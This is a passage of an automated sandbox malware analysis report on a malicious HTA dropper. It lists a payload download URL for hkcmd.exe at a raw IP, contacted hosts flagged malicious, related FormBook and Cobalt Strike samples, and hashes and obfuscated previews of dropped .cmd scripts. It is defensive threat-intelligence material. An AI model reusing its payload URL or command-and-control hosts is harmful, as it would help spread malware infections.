                                              https://www.google.com/images/branding/product/ico/googleg_alldp.icosysteminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://192.3.26.143/440/hkcmd.expowershell.exe, 00000003.00000002.1021362956.00000000056E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1021362956.0000000005321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsysteminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://192.3.26.143/440/hkcmd.exeGQ_8powershell.exe, 00000003.00000002.1058546726.0000000008923000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://pki.eset.com/crt/tsca2020.crt05hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1021362956.0000000005321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://pki.eset.com/crl/tsca2020.crl0?hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.microsoftEpowershell.exe, 00000003.00000002.1058546726.0000000008923000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://192.3.26.143/440/hkcmd.exeVVC:powershell.exe, 00000003.00000002.1058546726.0000000008991000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/Iconpowershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000F.00000003.1204395481.000001BFF0AE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drfalse
                                                                              		high
                                                                              http://crl.ver)svchost.exe, 0000000F.00000002.2113621083.000001BFF0C00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ac.ecosia.org?q=systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://g.live.com/odclientsettings/Prod1C:edb.log.15.drfalse
                                                                                      		high
                                                                                      https://www.ecosia.org/newtab/v20systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.shangaccurate.shopjy7dhEfPtuBr.exe, 0000000D.00000002.2116062584.0000000005DD5000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://crl.micropowershell.exe, 00000003.00000002.1054191935.00000000079B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://duckduckgo.com/chrome_newtabv20systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://pki.eset.com/crt/rootca2020.crt07hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://pki.eset.com/crl/rootca2020.crl0?hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.pmail.comhkcmd.exe, 00000006.00000002.1039105080.000000007EF59000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.984937213.0000000002B7A000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968372647.000000007EBC9000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968372647.000000007EB70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://192.3.26.143/440/hkcmd.exeLpowershell.exe, 00000003.00000002.1054320799.0000000007A07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://gemini.google.com/app?q=systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://pki.eset.com/crl/csca2020.crl0Ihkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          13.248.169.48
                                                                                                          		www.wavekeith.mediaUnited States
                                                                                                          		16509AMAZON-02UStrue
                                                                                                          192.197.113.156
                                                                                                          		x112.jieruitech.infoChina
                                                                                                          		133115HKKFGL-AS-APHKKwaifongGroupLimitedHKtrue
                                                                                                          38.181.35.142
                                                                                                          		www.zthzzyg.topUnited States
                                                                                                          		174COGENT-174UStrue
                                                                                                          104.21.85.156
                                                                                                          		www.shangaccurate.shopUnited States
                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                          192.3.26.143
                                                                                                          		unknownUnited States
                                                                                                          		36352AS-COLOCROSSINGUStrue
                                                                                                          209.74.80.150
                                                                                                          		www.lifway.lifeUnited States
                                                                                                          		31744MULTIBAND-NEWHOPEUStrue

                                                                                                          Private

                                                                                                          IP
                                                                                                          127.0.0.1

                                                                                                          General Information

                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                          Analysis ID:1664909
                                                                                                          Start date and time:2025-04-14 23:17:13 +02:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 9m 39s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:24
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:1
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:truelifewithmanmadethingsonherefor.hta
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.expl.evad.winHTA@27/21@8/7
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 90%
                                                                                                          • Number of executed functions: 75
                                                                                                          • Number of non-executed functions: 250
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .hta

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 23.76.34.6, 52.149.20.212
                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          17:18:10API Interceptor42x Sleep call for process: powershell.exe modified
                                                                                                          17:18:18API Interceptor2x Sleep call for process: hkcmd.exe modified
                                                                                                          17:18:42API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                          17:19:18API Interceptor1828346x Sleep call for process: systeminfo.exe modified

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          13.248.169.48fgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                          • www.genericagi.xyz/di53/
                                                                                                          RFQ COMPRESSOR-IR-4660.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.iphone16.shop/e2rc/
                                                                                                          Summary of Salary for the month of March-2025_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.conmoro.xyz/dxhk/
                                                                                                          Shipping doc.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.pembawa.xyz/uwhu/
                                                                                                          BBT-INVOICE-APRIL.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.xrhope.xyz/66zq/
                                                                                                          Invoice2025.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.immersivemoon.xyz/nlwj/
                                                                                                          11042025-Payment-swift.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.jicode.xyz/qasf/
                                                                                                          Updated Price List for 2025 Business Year.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.btcetf.xyz/mlo1/
                                                                                                          Updated Price List.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.globedesign.xyz/tb41/
                                                                                                          NEW RFQ IMMUNOCHE JB#40044.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.xrhope.xyz/66zq/
                                                                                                          192.197.113.156fgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            38.181.35.142fgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • www.zthzzyg.top/m2co/
                                                                                                            blessed.ps1Get hashmaliciousFormBookBrowse
                                                                                                            • www.rwcthha.top/syne/
                                                                                                            blessed.ps1Get hashmaliciousFormBookBrowse
                                                                                                            • www.rwcthha.top/syne/
                                                                                                            e2j0xn.ps1Get hashmaliciousFormBookBrowse
                                                                                                            • www.rwcthha.top/syne/

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            www.zthzzyg.topfgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • 38.181.35.142
                                                                                                            RFQ COMPRESSOR-IR-4660.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 38.181.35.142
                                                                                                            Ref. PTB 0425052.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 38.181.35.142
                                                                                                            www.shangaccurate.shopfgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • 172.67.207.82
                                                                                                            proforma invoice & packing list NDY1264 20250324.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.207.82
                                                                                                            RFQ DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.207.82
                                                                                                            Draft HBL No. ESSIN01902025.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.207.82
                                                                                                            www.wavekeith.mediafgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            x112.jieruitech.infofgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • 192.197.113.156
                                                                                                            www.lifway.lifefgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • 209.74.80.150

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            COGENT-174USfgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • 38.181.35.142
                                                                                                            https://docs.google.com/drawings/d/1QLzkysqyxbf0u-IXXhhRnGxh8krJZi8Tobovs_bCHZA/previewGet hashmaliciousGRQ ScamBrowse
                                                                                                            • 45.93.20.144
                                                                                                            RFQ COMPRESSOR-IR-4660.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 38.181.35.142
                                                                                                            20464563900027544281900365144211.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 206.237.19.121
                                                                                                            20464563900027544281900365144211.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 206.237.19.121
                                                                                                            http://www-kodi.comGet hashmaliciousUnknownBrowse
                                                                                                            • 45.93.20.58
                                                                                                            https://freegames2u.org/67c8217f5f4f4f18a19993e0Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                            • 149.248.213.147
                                                                                                            Dokument.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 38.180.121.243
                                                                                                            OB_0483.doc.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 38.180.49.67
                                                                                                            chastoti.xls.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 38.180.49.73
                                                                                                            CLOUDFLARENETUSfgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • 104.21.41.226
                                                                                                            bestgreatfeelingigotfromtheworkthfulplaceback.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            csrss.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                            • 104.21.80.1
                                                                                                            https://streamscenter.proGet hashmaliciousUnknownBrowse
                                                                                                            • 104.17.197.65
                                                                                                            http://www.hikemetal.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 104.18.190.237
                                                                                                            https://www.canva.com/design/DAGknhl3WgU/OmZKM52DyNeqqoA-QMV-Uw/view?utm_content=DAGknhl3WgU&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=he80de2beddGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.16.103.112
                                                                                                            original.emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                            • 104.17.25.14
                                                                                                            rXrbljagsbox.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                            • 104.21.16.1
                                                                                                            EXTERNAL Please DocuSign Required Clearance Documentation.msgGet hashmaliciousUnknownBrowse
                                                                                                            • 1.1.1.1
                                                                                                            http://bachilurikemab.sbuyprovidingnt.my.id/win/index.php?vq=JYkgP1gDmyQYUUcl5iK6PzVMZFJTVWhvZTJ3alVwOFdjV0VqU2c9PQ==Get hashmaliciousTechSupportScamBrowse
                                                                                                            • 104.21.96.1
                                                                                                            AMAZON-02USfgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            https://streamscenter.proGet hashmaliciousUnknownBrowse
                                                                                                            • 13.216.45.89
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 13.214.182.154
                                                                                                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 34.249.145.219
                                                                                                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 54.247.62.1
                                                                                                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 54.247.62.1
                                                                                                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 54.171.230.55
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 13.214.182.154
                                                                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 34.249.145.219
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 13.214.182.154
                                                                                                            HKKFGL-AS-APHKKwaifongGroupLimitedHKfgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                                                                                            • 192.197.113.156
                                                                                                            https://streamscenter.proGet hashmaliciousUnknownBrowse
                                                                                                            • 194.120.144.16
                                                                                                            vbnmghjkl.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 192.197.113.162
                                                                                                            DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 192.197.113.162
                                                                                                            DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 192.197.113.162
                                                                                                            DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 192.197.113.162
                                                                                                            splarm.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 194.120.171.35
                                                                                                            ##U70b9#U51fb#U6b64#U5904#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U5305ZH_CN.exeGet hashmaliciousGhostRatBrowse
                                                                                                            • 110.92.64.105
                                                                                                            ##U70b9#U51fb#U6b64#U5904#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U5305ZH_CN.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 110.92.64.105
                                                                                                            Anpy55Zkwp.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 192.197.113.162

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\ProgramData\1925.cmd

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Roaming\hkcmd.exe
                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):19854
                                                                                                            Entropy (8bit):4.799579726516822
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:cI9V3jUBZ6ocTNjb6yy2gbQ7AI8VbBR8blGXsfVsqvLWUzz2:cIzjMwF8yy2gbQ7KObcXvwLZ2
                                                                                                            MD5:1DF650CCA01129127D30063634AB5C03
                                                                                                            SHA1:BC7172DEC0B12B05F2247BD5E17751EB33474D4E
                                                                                                            SHA-256:EDD4094E7A82A6FF8BE65D6B075E9513BD15A6B74F8032B5C10CE18F7191FA60
                                                                                                            SHA-512:0BDDF9ECAAEDB0C30103A1FBFB644D6D4F7608BD596403307ED89B2390568C3A29E2CF55D10E2EADBFC407EDE52EAF9A4F2321BA5F37E358A1039F73C7688FBD
                                                                                                            Malicious:false
                                                                                                            Preview:@%........%e%..... ....%c%.. .. ..%h%.....%o% % %..o.... %o%.%f%..%f%...%..c%...r...%l%......%s%... .%..@%.....%e%..%c%.....%h%... .....%o% .. % %. ...%o%........%f%.%f%..........%..s%. . ... %e%...... ...%t%.. .. .% %.....%"%.....%s%. ..%Z%.....%k%...%r% .... ...%=%.........%s%. %e%.%t%....... ..% %. ...... %"%.......%..%sZkr%"%... .. ...%t%...%w%..%V%.... .%Y%.....%=% ...... .%=%. .....%"%.. . ....%..%sZkr%"%.......%t%.%A%.....%h%......%U%....%M%.... . %m%........%L% .....%r%.%f%..%R%... %%twVY%r%.%e%.. . . ..%m%..........% %. .%"%..%..%sZkr%"%. .....%K%. ..%j% %M% ......%q%.... .....%h%...%Y% ...%E%.. %O%.

                                                                                                            C:\ProgramData\34695.cmd

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Roaming\hkcmd.exe
                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (577), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2860
                                                                                                            Entropy (8bit):4.335677764406247
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:TpaPBLhRc/CQmhbR7T7RUHthMqH+2kWqedNhxeuMAvI7y2Ge4aTt:TpaPNSxYxTNcP+AXrvI+2a+t
                                                                                                            MD5:9A020804EBA1FFAC2928D7C795144BBF
                                                                                                            SHA1:61FDC4135AFDC99E106912AEAFEAC9C8A967BECC
                                                                                                            SHA-256:A86C6C7A2BF9E12C45275A5E7EBEBD5E6D2BA302FE0A12600B7C9FDF283D9E63
                                                                                                            SHA-512:42F6D754F1BDBEB6E4CC7AEB57FF4C4D126944F950D260A0839911E576AD16002C16122F81C1D39FA529432DCA0A48C9ACFBB18804CA9044425C8E424A5518BE
                                                                                                            Malicious:false
                                                                                                            Preview:@%.....%e%........r%c%....r%h%rr%o%.o...% %... ..%o%..%f%r..r...%f%.. ......%.."%........%C% %:% .%\%.........%W% ...o.. .%i%...o...%n%o..r.....%d%.........%o%. ..%w%....r.%s%....% %...%\%.o....%S%... %y%.. ....%s%...%W% .%O%....%W%...%6%o.o.r%4%......%\%....%s%....%v%.........%c%......%h%..%o%.......%s%......%t%....o.....%.%.........%p%.......%i%.....%f%... .r...%"%..% % ...%>%.........%n%..........%u%.........o%l%.. .o...% %.r...r...% % ..%&%.......o%..p%........

                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.7067220556713236
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqS:2JIB/wUKUKQncEmYRTwh02
                                                                                                            MD5:EFD23D1C867D82671B867CB589E8424C
                                                                                                            SHA1:842ED040BB35DBAD78C4B7E426A071DF8A8B1A6A
                                                                                                            SHA-256:008EC46CCC30CAB3A868B3A740DFA2264320E4440A73C3DF9CB10831D29542D1
                                                                                                            SHA-512:673B511A8CB502158C489C0EB8B5F96F0AA8AD9C1F2E7C76F014D288AA252192F3A8ADEFF799255764802E06086D09CE8F8AF70ECE9564BC8C2651449B370244
                                                                                                            Malicious:false
                                                                                                            Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5de4db5c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.7900002625261825
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:LSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:LazaPvgurTd42UgSii
                                                                                                            MD5:B0B05E11FA26EE66A897073FFBA5C7B3
                                                                                                            SHA1:0BA480B5D7F7C96F8460F3500FB7A4D36BF77CAC
                                                                                                            SHA-256:F15855A97DC476D92BCC6FA0AE4A2C0CA92CDCF241CDD1FCF615DEBF18488693
                                                                                                            SHA-512:15679ADCBBA93A570DA1624197936ED5DDFB4DCFB9D2BBE933B2CD2A7FA9AFD089AA3349B670392AD93A01060D30ED4E28E2EBA6B8991776D1DEB5061F1CCE14
                                                                                                            Malicious:false
                                                                                                            Preview:]..\... ...............X\...;...{......................0.`.....42...{5.*....}S.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................A..J*....}q.....................*....}S..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16384
                                                                                                            Entropy (8bit):0.08214897790483172
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:pJ/l/KYe4ArhbJzveqt/57Dek3JFsPOhb9/lAllEqW3l/TjzzQ/t:PtKzvzvPR3tFJhR/lAmd8/
                                                                                                            MD5:BDA139BBD1457AB483A26AEFB98433EF
                                                                                                            SHA1:384DF64AC98390E825E58F0E95589A98FA169C77
                                                                                                            SHA-256:23CE82DE9C7F8BC7C0C354A8D1B7BAD0454E28E9693E7FB4B94C7F01033B2AE9
                                                                                                            SHA-512:415BA6909D47B69650FB8BF20FC805F70E4520DC3F281E781046850D3809D637BC2FE5E4E3EF8BBF5BF856AC67EA8539DCBCF39473E5617801727A0561A60A71
                                                                                                            Malicious:false
                                                                                                            Preview:a%1r.....................................;...{..*....}S.42...{5.........42...{5.42...{5...Y.42...{59....................*....}S.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\ProgramData\neo.cmd

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Roaming\hkcmd.exe
                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (372), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):17570
                                                                                                            Entropy (8bit):4.749675665870814
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:7ChtOaPnz/rMnYsfg0fluW0mCRe9eRPCRpKJhF52Dn5Uo3:7atrYRg0tuWV8e0qRpym5U2
                                                                                                            MD5:5BAF253744AD26F35BA17DB6B80763E9
                                                                                                            SHA1:6235B00643E324AC5FEA07F9ADAE9F2A0DB56B99
                                                                                                            SHA-256:9CBB41E6C4F8565A6D121B770FCF3F15A6891C8DF8BFBA6D0414B3AD3298BDBA
                                                                                                            SHA-512:5C949A081D922963745A3F0DEEE87C9D862D278889A6C7790AABF34BC09E04DCE7B3AB41EF7A4F584571CCA739AF0A1DEA4FA244C378696AC7EA6D6AC9B415F8
                                                                                                            Malicious:false
